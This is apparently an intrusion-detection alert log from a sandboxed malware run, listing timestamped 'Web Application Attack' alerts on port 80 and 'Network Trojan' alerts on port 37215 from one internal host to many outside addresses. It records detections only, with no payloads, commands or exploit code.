          2024-12-03T23:02:25.276090+010020290341Web Application Attack192.168.2.234110857.128.103.18380TCP
          2024-12-03T23:02:25.356075+010020290341Web Application Attack192.168.2.2356260187.32.72.15380TCP
          2024-12-03T23:02:25.931444+010020290341Web Application Attack192.168.2.235339037.38.112.10580TCP
          2024-12-03T23:02:25.931562+010020290341Web Application Attack192.168.2.2342038133.63.128.15280TCP
          2024-12-03T23:02:25.931849+010020290341Web Application Attack192.168.2.2349984172.129.180.8980TCP
          2024-12-03T23:02:25.931892+010020290341Web Application Attack192.168.2.233963851.202.147.13480TCP
          2024-12-03T23:02:25.931922+010020290341Web Application Attack192.168.2.235328249.241.24.10680TCP
          2024-12-03T23:02:25.947650+010020290341Web Application Attack192.168.2.2346292211.247.224.21180TCP
          2024-12-03T23:02:25.947711+010020290341Web Application Attack192.168.2.2332950203.233.83.22780TCP
          2024-12-03T23:02:25.947790+010020290341Web Application Attack192.168.2.2351518145.255.225.14280TCP
          2024-12-03T23:02:25.947941+010020290341Web Application Attack192.168.2.234317673.84.140.19080TCP
          2024-12-03T23:02:25.947959+010020290341Web Application Attack192.168.2.235719454.125.50.11180TCP
          2024-12-03T23:02:25.956594+010020290341Web Application Attack192.168.2.233619871.107.70.5880TCP
          2024-12-03T23:02:25.956691+010020290341Web Application Attack192.168.2.2354090177.240.197.15880TCP
          2024-12-03T23:02:25.956907+010020290341Web Application Attack192.168.2.2350942137.150.89.23280TCP
          2024-12-03T23:02:25.962678+010020290341Web Application Attack192.168.2.2359728157.144.82.4480TCP
          2024-12-03T23:02:25.962765+010020290341Web Application Attack192.168.2.2356432126.89.116.14980TCP
          2024-12-03T23:02:25.972035+010020290341Web Application Attack192.168.2.233362089.128.150.9280TCP
          2024-12-03T23:02:25.978415+010020290341Web Application Attack192.168.2.233905462.206.122.11280TCP
          2024-12-03T23:02:25.978544+010020290341Web Application Attack192.168.2.234657277.166.16.19380TCP
          2024-12-03T23:02:26.003421+010020290341Web Application Attack192.168.2.235744462.205.39.10980TCP
          2024-12-03T23:02:26.003538+010020290341Web Application Attack192.168.2.2335468165.237.166.8480TCP
          2024-12-03T23:02:26.009593+010020290341Web Application Attack192.168.2.234178670.228.253.24080TCP
          2024-12-03T23:02:26.018855+010020290341Web Application Attack192.168.2.2333240141.175.5.22380TCP
          2024-12-03T23:02:26.197281+010020290341Web Application Attack192.168.2.2344038185.51.90.9880TCP
          2024-12-03T23:02:26.228604+010020290341Web Application Attack192.168.2.2360564174.237.64.8880TCP
          2024-12-03T23:02:26.228730+010020290341Web Application Attack192.168.2.233951440.10.15.1180TCP
          2024-12-03T23:02:26.253165+010020290341Web Application Attack192.168.2.233724857.202.180.18380TCP
          2024-12-03T23:02:26.790884+010020290341Web Application Attack192.168.2.2353768191.228.54.5380TCP
          2024-12-03T23:02:26.806691+010020290341Web Application Attack192.168.2.2336828110.44.250.8280TCP
          2024-12-03T23:02:26.822745+010020290341Web Application Attack192.168.2.2347880210.1.89.25580TCP
          2024-12-03T23:02:26.831922+010020290341Web Application Attack192.168.2.2356370196.190.48.12680TCP
          2024-12-03T23:02:26.832077+010020290341Web Application Attack192.168.2.2353562204.240.175.5280TCP
          2024-12-03T23:02:27.134788+010020290341Web Application Attack192.168.2.2359386159.125.18.580TCP
          2024-12-03T23:02:27.197385+010020290341Web Application Attack192.168.2.235561090.244.204.6280TCP
          2024-12-03T23:02:27.197458+010020290341Web Application Attack192.168.2.235785657.249.135.16780TCP
          2024-12-03T23:02:27.206585+010020290341Web Application Attack192.168.2.2336856130.92.189.10880TCP
          2024-12-03T23:02:27.213008+010020290341Web Application Attack192.168.2.234567088.214.253.3080TCP
          2024-12-03T23:02:27.253450+010020290341Web Application Attack192.168.2.2342192157.75.188.16780TCP
          2024-12-03T23:02:28.197382+010020290341Web Application Attack192.168.2.23605629.170.53.21180TCP
          2024-12-03T23:02:28.268927+010020290341Web Application Attack192.168.2.235417499.6.29.12580TCP
          2024-12-03T23:02:28.275513+010020290341Web Application Attack192.168.2.235621442.101.107.7880TCP
          2024-12-03T23:02:28.284998+010020290341Web Application Attack192.168.2.2355298167.195.228.18580TCP
          2024-12-03T23:02:28.300212+010020290341Web Application Attack192.168.2.234118458.181.107.13180TCP
          2024-12-03T23:02:28.322362+010020290341Web Application Attack192.168.2.2338620124.240.76.13080TCP
          2024-12-03T23:02:28.322571+010020290341Web Application Attack192.168.2.235521697.131.151.13480TCP
          2024-12-03T23:02:28.362878+010020290341Web Application Attack192.168.2.2340682146.78.192.10280TCP
          2024-12-03T23:02:28.369027+010020290341Web Application Attack192.168.2.2357846218.160.198.6880TCP
          2024-12-03T23:02:28.409563+010020290341Web Application Attack192.168.2.2333040130.195.228.12480TCP
          2024-12-03T23:02:28.409695+010020290341Web Application Attack192.168.2.2355690212.164.197.4580TCP
          2024-12-03T23:02:28.763576+010020290341Web Application Attack192.168.2.234306645.203.146.19680TCP
          2024-12-03T23:02:29.087693+010020290341Web Application Attack192.168.2.2343062100.47.39.6480TCP
          2024-12-03T23:02:29.097175+010020290341Web Application Attack192.168.2.235372243.37.19.6680TCP
          2024-12-03T23:02:29.119183+010020290341Web Application Attack192.168.2.2345968118.88.160.20580TCP
          2024-12-03T23:02:29.119253+010020290341Web Application Attack192.168.2.235441657.9.56.3080TCP
          2024-12-03T23:02:29.145017+010020290341Web Application Attack192.168.2.2346584195.194.204.14580TCP
          2024-12-03T23:02:29.158908+010020290341Web Application Attack192.168.2.2355514120.51.53.21280TCP
          2024-12-03T23:02:29.495197+010020290341Web Application Attack192.168.2.2340606120.96.167.780TCP
          2024-12-03T23:02:29.526313+010020290341Web Application Attack192.168.2.2350792220.24.222.24780TCP
          2024-12-03T23:02:29.526338+010020290341Web Application Attack192.168.2.2359450122.191.41.17680TCP
          2024-12-03T23:02:29.535319+010020290341Web Application Attack192.168.2.233544293.210.77.24980TCP
          2024-12-03T23:02:29.535483+010020290341Web Application Attack192.168.2.234656047.31.48.9580TCP
          2024-12-03T23:02:29.566709+010020290341Web Application Attack192.168.2.235998692.182.109.13480TCP
          2024-12-03T23:02:29.566730+010020290341Web Application Attack192.168.2.2352042205.62.181.15080TCP
          2024-12-03T23:02:30.244257+010020290341Web Application Attack192.168.2.2336762181.2.206.15480TCP
          2024-12-03T23:02:30.244470+010020290341Web Application Attack192.168.2.2335140161.104.243.11880TCP
          2024-12-03T23:02:30.253339+010020290341Web Application Attack192.168.2.2350694135.50.4.17980TCP
          2024-12-03T23:02:30.284813+010020290341Web Application Attack192.168.2.2338924208.102.194.8080TCP
          2024-12-03T23:02:30.284816+010020290341Web Application Attack192.168.2.2348718131.216.31.15280TCP
          2024-12-03T23:02:30.775320+010020290341Web Application Attack192.168.2.2357744179.176.136.21780TCP
          2024-12-03T23:02:30.775420+010020290341Web Application Attack192.168.2.2341870178.26.134.8780TCP
          2024-12-03T23:02:30.816306+010020290341Web Application Attack192.168.2.2341808192.62.28.15480TCP
          2024-12-03T23:02:30.816309+010020290341Web Application Attack192.168.2.2352688207.214.255.1580TCP
          2024-12-03T23:02:30.831402+010020290341Web Application Attack192.168.2.2345936208.122.104.12980TCP
          2024-12-03T23:02:31.384783+010020290341Web Application Attack192.168.2.2336564130.15.156.10180TCP
          2024-12-03T23:02:31.409655+010020290341Web Application Attack192.168.2.2336694196.4.107.3480TCP
          2024-12-03T23:02:31.409841+010020290341Web Application Attack192.168.2.2343436173.19.150.14580TCP
          2024-12-03T23:02:31.431854+010020290341Web Application Attack192.168.2.2359218149.144.220.12280TCP
          2024-12-03T23:02:31.456563+010020290341Web Application Attack192.168.2.2333606168.205.155.8780TCP
          2024-12-03T23:02:31.565866+010020290341Web Application Attack192.168.2.235510661.251.115.9580TCP
          2024-12-03T23:02:31.565876+010020290341Web Application Attack192.168.2.234965072.104.229.580TCP
          2024-12-03T23:02:31.566082+010020290341Web Application Attack192.168.2.2335586153.41.160.1980TCP
          2024-12-03T23:02:31.572314+010020290341Web Application Attack192.168.2.2340006197.221.243.18680TCP
          2024-12-03T23:02:31.572470+010020290341Web Application Attack192.168.2.23409061.99.148.15280TCP
          2024-12-03T23:02:31.572575+010020290341Web Application Attack192.168.2.2345718108.245.0.4780TCP
          2024-12-03T23:02:31.582000+010020290341Web Application Attack192.168.2.233895857.17.247.4880TCP
          2024-12-03T23:02:32.525542+010020290341Web Application Attack192.168.2.2355664220.202.214.7380TCP
          2024-12-03T23:02:32.572282+010020290341Web Application Attack192.168.2.2354930119.229.42.4380TCP
          2024-12-03T23:02:32.572286+010020290341Web Application Attack192.168.2.2355488135.106.99.2980TCP
          2024-12-03T23:02:32.572379+010020290341Web Application Attack192.168.2.2355326208.23.123.18480TCP
          2024-12-03T23:02:32.597376+010020290341Web Application Attack192.168.2.2338294142.129.100.22380TCP
          2024-12-03T23:02:33.775493+010020290341Web Application Attack192.168.2.2357452122.238.169.22480TCP
          2024-12-03T23:02:33.822326+010020290341Web Application Attack192.168.2.2354742192.24.226.13780TCP
          2024-12-03T23:02:33.822495+010020290341Web Application Attack192.168.2.2359844189.161.132.8980TCP
          2024-12-03T23:02:33.831582+010020290341Web Application Attack192.168.2.2352202160.86.170.8880TCP
          2024-12-03T23:02:33.853654+010020290341Web Application Attack192.168.2.2360772116.227.243.10080TCP
          2024-12-03T23:02:33.853756+010020290341Web Application Attack192.168.2.235647041.247.11.23480TCP
          2024-12-03T23:02:33.863286+010020290341Web Application Attack192.168.2.2360118132.193.129.16680TCP
          2024-12-03T23:02:33.878990+010020290341Web Application Attack192.168.2.2338302124.201.144.16780TCP
          2024-12-03T23:02:34.378502+010020290341Web Application Attack192.168.2.2350118200.139.81.24880TCP
          2024-12-03T23:02:34.572522+010020290341Web Application Attack192.168.2.2345764223.11.137.17180TCP
          2024-12-03T23:02:34.597296+010020290341Web Application Attack192.168.2.233436636.153.54.8180TCP
          2024-12-03T23:02:34.619255+010020290341Web Application Attack192.168.2.2340222109.68.30.22180TCP
          2024-12-03T23:02:34.659817+010020290341Web Application Attack192.168.2.2337602213.155.78.7080TCP
          2024-12-03T23:02:34.697319+010020290341Web Application Attack192.168.2.2359712199.223.119.7280TCP
          2024-12-03T23:02:34.737894+010020290341Web Application Attack192.168.2.23454888.198.96.2880TCP
          2024-12-03T23:02:34.753587+010020290341Web Application Attack192.168.2.2357878194.143.31.12180TCP
          2024-12-03T23:02:34.759780+010020290341Web Application Attack192.168.2.2337404192.154.89.21780TCP
          2024-12-03T23:02:34.784641+010020290341Web Application Attack192.168.2.234306692.12.118.1880TCP
          2024-12-03T23:02:34.784709+010020290341Web Application Attack192.168.2.234342432.96.106.13680TCP
          2024-12-03T23:02:36.713026+010020290341Web Application Attack192.168.2.235025053.255.254.10980TCP
          2024-12-03T23:02:36.769162+010020290341Web Application Attack192.168.2.2351242186.15.37.18180TCP
          2024-12-03T23:02:36.784639+010020290341Web Application Attack192.168.2.2333076171.30.84.22980TCP
          2024-12-03T23:02:36.784869+010020290341Web Application Attack192.168.2.234732492.241.207.7680TCP
          2024-12-03T23:02:37.715321+010020290341Web Application Attack192.168.2.2342274134.252.61.17380TCP
          2024-12-03T23:02:37.728895+010020290341Web Application Attack192.168.2.2355588206.186.8.23480TCP
          2024-12-03T23:02:37.738068+010020290341Web Application Attack192.168.2.2360842208.224.38.7880TCP
          2024-12-03T23:02:37.744298+010020290341Web Application Attack192.168.2.233931683.137.66.10180TCP
          2024-12-03T23:02:37.753608+010020290341Web Application Attack192.168.2.2346152198.131.70.4880TCP
          2024-12-03T23:02:37.759977+010020290341Web Application Attack192.168.2.2344760209.93.163.20680TCP
          2024-12-03T23:02:37.785167+010020290341Web Application Attack192.168.2.2334242107.129.75.3780TCP
          2024-12-03T23:02:37.785244+010020290341Web Application Attack192.168.2.233642635.143.212.21580TCP
          2024-12-03T23:02:37.996715+010020290341Web Application Attack192.168.2.234614647.59.50.22980TCP
          2024-12-03T23:02:37.996748+010020290341Web Application Attack192.168.2.234549862.50.206.21780TCP
          2024-12-03T23:02:38.019809+010020290341Web Application Attack192.168.2.2353688108.93.80.7080TCP
          2024-12-03T23:02:38.039566+010020290341Web Application Attack192.168.2.2355890183.70.114.23980TCP
          2024-12-03T23:02:38.039578+010020290341Web Application Attack192.168.2.234233693.116.139.17880TCP
          2024-12-03T23:02:38.039731+010020290341Web Application Attack192.168.2.2333172204.76.204.18080TCP
          2024-12-03T23:02:38.039977+010020290341Web Application Attack192.168.2.234383495.149.63.19180TCP
          2024-12-03T23:02:38.066085+010020290341Web Application Attack192.168.2.2352426172.71.214.20580TCP
          2024-12-03T23:02:38.066113+010020290341Web Application Attack192.168.2.2337072155.142.246.16580TCP
          2024-12-03T23:02:38.925763+010020290341Web Application Attack192.168.2.2338416194.168.226.8980TCP
          2024-12-03T23:02:38.963145+010020290341Web Application Attack192.168.2.2348560204.156.164.16580TCP
          2024-12-03T23:02:38.994200+010020290341Web Application Attack192.168.2.234495252.68.103.15480TCP
          2024-12-03T23:02:39.038909+010020290341Web Application Attack192.168.2.2340238111.96.61.2280TCP
          2024-12-03T23:02:39.038917+010020290341Web Application Attack192.168.2.235283859.255.82.25580TCP
          2024-12-03T23:02:39.039532+010020290341Web Application Attack192.168.2.235510623.135.240.3980TCP
          2024-12-03T23:02:39.039660+010020290341Web Application Attack192.168.2.235645046.115.240.14580TCP
          2024-12-03T23:02:39.050460+010020290341Web Application Attack192.168.2.2350870132.101.84.21080TCP
          2024-12-03T23:02:39.259989+010020290341Web Application Attack192.168.2.23420401.113.249.7680TCP
          2024-12-03T23:02:39.275598+010020290341Web Application Attack192.168.2.234309674.177.48.20880TCP
          2024-12-03T23:02:39.275718+010020290341Web Application Attack192.168.2.2342442132.139.194.8680TCP
          2024-12-03T23:02:39.300461+010020290341Web Application Attack192.168.2.235854872.43.128.1080TCP
          2024-12-03T23:02:39.306792+010020290341Web Application Attack192.168.2.2333134179.23.54.3980TCP
          2024-12-03T23:02:39.322548+010020290341Web Application Attack192.168.2.2357678169.180.238.20280TCP
          2024-12-03T23:02:39.916255+010020290341Web Application Attack192.168.2.2352680175.207.149.20680TCP
          2024-12-03T23:02:40.869201+010020290341Web Application Attack192.168.2.2344164186.64.229.6580TCP
          2024-12-03T23:02:40.869492+010020290341Web Application Attack192.168.2.2352436199.4.164.18480TCP
          2024-12-03T23:02:40.885189+010020290341Web Application Attack192.168.2.2352668204.153.221.22280TCP
          2024-12-03T23:02:40.900611+010020290341Web Application Attack192.168.2.2342066175.105.152.8680TCP
          2024-12-03T23:02:40.916304+010020290341Web Application Attack192.168.2.233879854.118.162.6780TCP
          2024-12-03T23:02:40.916499+010020290341Web Application Attack192.168.2.235190265.153.227.2780TCP
          2024-12-03T23:02:40.925727+010020290341Web Application Attack192.168.2.234771460.162.227.1580TCP
          2024-12-03T23:02:40.931784+010020290341Web Application Attack192.168.2.235259696.60.65.1580TCP
          2024-12-03T23:02:40.941187+010020290341Web Application Attack192.168.2.2353416139.28.65.25280TCP
          2024-12-03T23:02:40.947384+010020290341Web Application Attack192.168.2.2344546168.79.83.9480TCP
          2024-12-03T23:02:40.956644+010020290341Web Application Attack192.168.2.2355292187.105.157.12580TCP
          2024-12-03T23:02:40.994960+010020290341Web Application Attack192.168.2.2359824190.124.82.4180TCP
          2024-12-03T23:02:40.994974+010020290341Web Application Attack192.168.2.2359264155.116.200.24380TCP
          2024-12-03T23:02:40.994998+010020290341Web Application Attack192.168.2.2350888145.61.154.11980TCP
          2024-12-03T23:02:41.010311+010020290341Web Application Attack192.168.2.234991080.19.155.19080TCP
          2024-12-03T23:02:41.019260+010020290341Web Application Attack192.168.2.2342154169.124.154.3280TCP
          2024-12-03T23:02:41.040804+010020290341Web Application Attack192.168.2.234324865.73.110.20980TCP
          2024-12-03T23:02:41.040827+010020290341Web Application Attack192.168.2.234799857.184.39.23980TCP
          2024-12-03T23:02:41.040843+010020290341Web Application Attack192.168.2.2346558211.3.38.080TCP
          2024-12-03T23:02:41.042939+010020290341Web Application Attack192.168.2.234514642.155.200.2080TCP
          2024-12-03T23:02:41.275655+010020290341Web Application Attack192.168.2.2338428129.243.89.280TCP
          2024-12-03T23:02:41.363308+010020290341Web Application Attack192.168.2.2341348189.55.146.22080TCP
          2024-12-03T23:02:42.394409+010020290341Web Application Attack192.168.2.235110639.172.92.9880TCP
          2024-12-03T23:02:42.432100+010020290341Web Application Attack192.168.2.2350440174.205.199.19580TCP
          2024-12-03T23:02:42.432244+010020290341Web Application Attack192.168.2.234781244.133.115.19380TCP
          2024-12-03T23:02:42.432314+010020290341Web Application Attack192.168.2.236098647.69.60.5680TCP
          2024-12-03T23:02:42.456933+010020290341Web Application Attack192.168.2.2350248105.181.157.11880TCP
          2024-12-03T23:02:42.463402+010020290341Web Application Attack192.168.2.2335546112.153.77.2980TCP
          2024-12-03T23:02:42.473423+010020290341Web Application Attack192.168.2.2350222223.221.42.15080TCP
          2024-12-03T23:02:42.487652+010020290341Web Application Attack192.168.2.235905850.72.83.5580TCP
          2024-12-03T23:02:42.494593+010020290341Web Application Attack192.168.2.2336820132.68.104.25480TCP
          2024-12-03T23:02:42.503616+010020290341Web Application Attack192.168.2.234799092.67.145.7580TCP
          2024-12-03T23:02:42.519267+010020290341Web Application Attack192.168.2.2355890170.143.90.16580TCP
          2024-12-03T23:02:42.519501+010020290341Web Application Attack192.168.2.233450693.138.26.6980TCP
          2024-12-03T23:02:45.244681+010020290341Web Application Attack192.168.2.233418024.135.171.2280TCP
          2024-12-03T23:02:45.363662+010020290341Web Application Attack192.168.2.235314051.205.82.21380TCP
          2024-12-03T23:02:46.166588+010020290341Web Application Attack192.168.2.2345734221.112.221.18580TCP
          2024-12-03T23:02:46.182346+010020290341Web Application Attack192.168.2.2339318150.77.11.3180TCP
          2024-12-03T23:02:46.182353+010020290341Web Application Attack192.168.2.2360260218.156.44.13180TCP
          2024-12-03T23:02:46.182458+010020290341Web Application Attack192.168.2.23486385.170.20.8280TCP
          2024-12-03T23:02:46.182636+010020290341Web Application Attack192.168.2.2349036195.23.137.12880TCP
          2024-12-03T23:02:46.182806+010020290341Web Application Attack192.168.2.23363545.197.2.5780TCP
          2024-12-03T23:02:46.197668+010020290341Web Application Attack192.168.2.2349076171.114.61.17180TCP
          2024-12-03T23:02:46.198162+010020290341Web Application Attack192.168.2.2355606187.63.41.17580TCP
          2024-12-03T23:02:46.198219+010020290341Web Application Attack192.168.2.2345856180.176.144.19480TCP
          2024-12-03T23:02:46.229074+010020290341Web Application Attack192.168.2.233679650.132.187.19480TCP
          2024-12-03T23:02:46.229163+010020290341Web Application Attack192.168.2.234041639.50.202.10680TCP
          2024-12-03T23:02:46.238469+010020290341Web Application Attack192.168.2.2337046119.65.57.17780TCP
          2024-12-03T23:02:46.238582+010020290341Web Application Attack192.168.2.233368880.230.160.12380TCP
          2024-12-03T23:02:46.238653+010020290341Web Application Attack192.168.2.2340516122.193.77.23680TCP
          2024-12-03T23:02:46.238834+010020290341Web Application Attack192.168.2.235214498.124.81.22680TCP
          2024-12-03T23:02:46.244529+010020290341Web Application Attack192.168.2.233484068.151.41.22080TCP
          2024-12-03T23:02:46.244613+010020290341Web Application Attack192.168.2.2360268168.193.104.17380TCP
          2024-12-03T23:02:46.244707+010020290341Web Application Attack192.168.2.2356798104.163.127.22180TCP
          2024-12-03T23:02:46.244939+010020290341Web Application Attack192.168.2.233747820.8.82.25280TCP
          2024-12-03T23:02:46.253642+010020290341Web Application Attack192.168.2.234279614.210.195.11880TCP
          2024-12-03T23:02:46.253818+010020290341Web Application Attack192.168.2.2359238181.220.26.3280TCP
          2024-12-03T23:02:46.253879+010020290341Web Application Attack192.168.2.23476701.3.136.20180TCP
          2024-12-03T23:02:46.254131+010020290341Web Application Attack192.168.2.2345134161.233.72.25580TCP
          2024-12-03T23:02:46.254255+010020290341Web Application Attack192.168.2.2336474204.240.163.13580TCP
          2024-12-03T23:02:46.254345+010020290341Web Application Attack192.168.2.2359416165.11.16.7280TCP
          2024-12-03T23:02:46.254406+010020290341Web Application Attack192.168.2.233945812.132.132.23280TCP
          2024-12-03T23:02:46.254497+010020290341Web Application Attack192.168.2.2333752200.159.220.2380TCP
          2024-12-03T23:02:46.254648+010020290341Web Application Attack192.168.2.233567225.127.18.4980TCP
          2024-12-03T23:02:46.254767+010020290341Web Application Attack192.168.2.2338090113.46.88.24080TCP
          2024-12-03T23:02:46.285090+010020290341Web Application Attack192.168.2.2349592130.68.95.12580TCP
          2024-12-03T23:02:46.285237+010020290341Web Application Attack192.168.2.2342934131.29.112.21680TCP
          2024-12-03T23:02:47.260229+010020290341Web Application Attack192.168.2.2360668210.51.145.2780TCP
          2024-12-03T23:02:47.275850+010020290341Web Application Attack192.168.2.2345438149.64.159.20180TCP
          2024-12-03T23:02:47.291294+010020290341Web Application Attack192.168.2.234158699.199.126.17580TCP
          2024-12-03T23:02:47.322918+010020290341Web Application Attack192.168.2.235010659.191.121.4980TCP
          2024-12-03T23:02:47.331990+010020290341Web Application Attack192.168.2.233398493.251.103.3780TCP
          2024-12-03T23:02:47.332135+010020290341Web Application Attack192.168.2.234359066.238.208.2280TCP
          2024-12-03T23:02:47.332183+010020290341Web Application Attack192.168.2.2353098201.80.204.17180TCP
          2024-12-03T23:02:47.347821+010020290341Web Application Attack192.168.2.2346072188.77.166.6580TCP
          2024-12-03T23:02:47.347923+010020290341Web Application Attack192.168.2.2341476198.92.160.22980TCP
          2024-12-03T23:02:47.488300+010020290341Web Application Attack192.168.2.2338320160.20.120.880TCP
          2024-12-03T23:02:48.354833+010020290341Web Application Attack192.168.2.233327887.158.2.23880TCP
          2024-12-03T23:02:48.378871+010020290341Web Application Attack192.168.2.233877245.124.116.5880TCP
          2024-12-03T23:02:48.394237+010020290341Web Application Attack192.168.2.235317299.159.215.10380TCP
          2024-12-03T23:02:48.410304+010020290341Web Application Attack192.168.2.2351628192.222.27.10180TCP
          2024-12-03T23:02:48.441784+010020290341Web Application Attack192.168.2.233452689.150.199.16480TCP
          2024-12-03T23:02:48.603839+010020290341Web Application Attack192.168.2.2350074104.166.6.13280TCP
          2024-12-03T23:02:48.644515+010020290341Web Application Attack192.168.2.233873892.192.221.13980TCP
          2024-12-03T23:02:48.650915+010020290341Web Application Attack192.168.2.2343768163.251.100.2880TCP
          2024-12-03T23:02:48.650958+010020290341Web Application Attack192.168.2.234761660.191.55.2880TCP
          2024-12-03T23:02:48.660213+010020290341Web Application Attack192.168.2.23453462.74.167.13380TCP
          2024-12-03T23:02:48.660343+010020290341Web Application Attack192.168.2.235537093.231.170.13380TCP
          2024-12-03T23:02:51.819085+010020290341Web Application Attack192.168.2.2349838186.65.123.23680TCP
          2024-12-03T23:02:52.550818+010020290341Web Application Attack192.168.2.234130866.253.65.11880TCP
          2024-12-03T23:02:52.582032+010020290341Web Application Attack192.168.2.2351992174.66.171.12280TCP
          2024-12-03T23:02:52.651815+010020290341Web Application Attack192.168.2.2344550184.137.226.7080TCP
          2024-12-03T23:02:52.660153+010020290341Web Application Attack192.168.2.2356650210.204.159.19280TCP
          2024-12-03T23:02:52.669465+010020290341Web Application Attack192.168.2.2348394223.73.112.21080TCP
          2024-12-03T23:02:52.676399+010020290341Web Application Attack192.168.2.233416673.77.117.5780TCP
          2024-12-03T23:02:52.676627+010020290341Web Application Attack192.168.2.2356028173.14.136.4580TCP
          2024-12-03T23:02:52.676697+010020290341Web Application Attack192.168.2.2343784181.201.168.3880TCP
          2024-12-03T23:02:52.676697+010020290341Web Application Attack192.168.2.2352960116.23.243.380TCP
          2024-12-03T23:02:52.707091+010020290341Web Application Attack192.168.2.233583243.202.19.5080TCP
          2024-12-03T23:02:52.707148+010020290341Web Application Attack192.168.2.2352352133.66.233.4880TCP
          2024-12-03T23:02:53.119331+010020290341Web Application Attack192.168.2.235643220.235.150.22480TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-03T23:02:14.696795+010028352221A Network Trojan was detected192.168.2.2357020156.61.209.11437215TCP
          2024-12-03T23:02:14.697128+010028352221A Network Trojan was detected192.168.2.2357306156.110.162.23937215TCP
          2024-12-03T23:02:14.697188+010028352221A Network Trojan was detected192.168.2.2346368197.41.187.19737215TCP
          2024-12-03T23:02:14.697219+010028352221A Network Trojan was detected192.168.2.2345100156.28.189.14737215TCP
          2024-12-03T23:02:14.697303+010028352221A Network Trojan was detected192.168.2.234137441.186.242.23137215TCP
          2024-12-03T23:02:14.712659+010028352221A Network Trojan was detected192.168.2.234396241.128.193.6937215TCP
          2024-12-03T23:02:14.712659+010028352221A Network Trojan was detected192.168.2.235970041.9.223.14837215TCP
          2024-12-03T23:02:14.712664+010028352221A Network Trojan was detected192.168.2.2341410156.67.96.7037215TCP
          2024-12-03T23:02:14.712928+010028352221A Network Trojan was detected192.168.2.2352456197.123.236.3237215TCP
          2024-12-03T23:02:14.713054+010028352221A Network Trojan was detected192.168.2.2349108156.75.54.18637215TCP
          2024-12-03T23:02:14.721752+010028352221A Network Trojan was detected192.168.2.2342846156.158.172.24337215TCP
          2024-12-03T23:02:14.721862+010028352221A Network Trojan was detected192.168.2.234127241.56.205.3437215TCP
          2024-12-03T23:02:14.728162+010028352221A Network Trojan was detected192.168.2.2344818197.179.146.19837215TCP
          2024-12-03T23:02:14.728291+010028352221A Network Trojan was detected192.168.2.235211441.185.84.3237215TCP
          2024-12-03T23:02:14.728422+010028352221A Network Trojan was detected192.168.2.2347630156.44.235.1637215TCP
          2024-12-03T23:02:14.728692+010028352221A Network Trojan was detected192.168.2.2349474156.114.247.12837215TCP
          2024-12-03T23:02:14.737328+010028352221A Network Trojan was detected192.168.2.2352016197.195.206.13637215TCP
          2024-12-03T23:02:14.737412+010028352221A Network Trojan was detected192.168.2.2358514197.112.141.25037215TCP
          2024-12-03T23:02:14.737537+010028352221A Network Trojan was detected192.168.2.2350588156.23.144.8137215TCP
          2024-12-03T23:02:14.737616+010028352221A Network Trojan was detected192.168.2.2348106197.158.151.6837215TCP
          2024-12-03T23:02:14.743721+010028352221A Network Trojan was detected192.168.2.234266841.51.237.6337215TCP
          2024-12-03T23:02:14.743837+010028352221A Network Trojan was detected192.168.2.2337384197.59.205.7237215TCP
          2024-12-03T23:02:14.743911+010028352221A Network Trojan was detected192.168.2.2360860197.201.203.20037215TCP
          2024-12-03T23:02:14.744012+010028352221A Network Trojan was detected192.168.2.2343964197.3.154.23537215TCP
          2024-12-03T23:02:14.744145+010028352221A Network Trojan was detected192.168.2.2348344197.123.157.2437215TCP
          2024-12-03T23:02:14.744259+010028352221A Network Trojan was detected192.168.2.2348890197.213.139.4537215TCP
          2024-12-03T23:02:14.744364+010028352221A Network Trojan was detected192.168.2.2345800156.146.0.17337215TCP
          2024-12-03T23:02:14.744591+010028352221A Network Trojan was detected192.168.2.2335196156.30.14.11037215TCP
          2024-12-03T23:02:14.752999+010028352221A Network Trojan was detected192.168.2.2334620197.69.230.16937215TCP
          2024-12-03T23:02:14.753114+010028352221A Network Trojan was detected192.168.2.2343268156.134.142.21637215TCP
          2024-12-03T23:02:14.753312+010028352221A Network Trojan was detected192.168.2.234834041.182.228.10637215TCP
          2024-12-03T23:02:14.759285+010028352221A Network Trojan was detected192.168.2.2355288197.79.233.8037215TCP
          2024-12-03T23:02:14.759396+010028352221A Network Trojan was detected192.168.2.2345280156.76.37.5637215TCP
          2024-12-03T23:02:14.759491+010028352221A Network Trojan was detected192.168.2.2353726197.167.188.18437215TCP
          2024-12-03T23:02:14.759612+010028352221A Network Trojan was detected192.168.2.2359634156.205.236.937215TCP
          2024-12-03T23:02:14.768666+010028352221A Network Trojan was detected192.168.2.2338152156.64.119.22737215TCP
          2024-12-03T23:02:14.768846+010028352221A Network Trojan was detected192.168.2.234594441.89.254.9637215TCP
          2024-12-03T23:02:14.768958+010028352221A Network Trojan was detected192.168.2.235442841.153.210.037215TCP
          2024-12-03T23:02:14.769167+010028352221A Network Trojan was detected192.168.2.2338648197.235.235.15437215TCP
          2024-12-03T23:02:14.769285+010028352221A Network Trojan was detected192.168.2.234646441.155.219.17837215TCP
          2024-12-03T23:02:14.769344+010028352221A Network Trojan was detected192.168.2.2356880197.163.246.24337215TCP
          2024-12-03T23:02:14.769450+010028352221A Network Trojan was detected192.168.2.2340346197.169.178.5537215TCP
          2024-12-03T23:02:14.769544+010028352221A Network Trojan was detected192.168.2.2349302197.161.10.6537215TCP
          2024-12-03T23:02:14.769609+010028352221A Network Trojan was detected192.168.2.2349966156.180.14.8637215TCP
          2024-12-03T23:02:14.769726+010028352221A Network Trojan was detected192.168.2.233876241.8.68.18037215TCP
          2024-12-03T23:02:14.769784+010028352221A Network Trojan was detected192.168.2.2342426156.92.88.23037215TCP
          2024-12-03T23:02:14.786263+010028352221A Network Trojan was detected192.168.2.235094641.237.37.21637215TCP
          2024-12-03T23:02:14.786399+010028352221A Network Trojan was detected192.168.2.2340266156.155.195.25337215TCP
          2024-12-03T23:02:14.786501+010028352221A Network Trojan was detected192.168.2.234725441.29.72.1637215TCP
          2024-12-03T23:02:14.786642+010028352221A Network Trojan was detected192.168.2.233959841.164.73.8537215TCP
          2024-12-03T23:02:14.786783+010028352221A Network Trojan was detected192.168.2.236007241.102.141.1637215TCP
          2024-12-03T23:02:14.786901+010028352221A Network Trojan was detected192.168.2.233496641.38.16.10337215TCP
          2024-12-03T23:02:14.787027+010028352221A Network Trojan was detected192.168.2.234308041.235.143.15637215TCP
          2024-12-03T23:02:14.787141+010028352221A Network Trojan was detected192.168.2.2337894197.57.152.22737215TCP
          2024-12-03T23:02:14.787282+010028352221A Network Trojan was detected192.168.2.2335620156.29.58.5537215TCP
          2024-12-03T23:02:14.787399+010028352221A Network Trojan was detected192.168.2.2351570156.31.133.22237215TCP
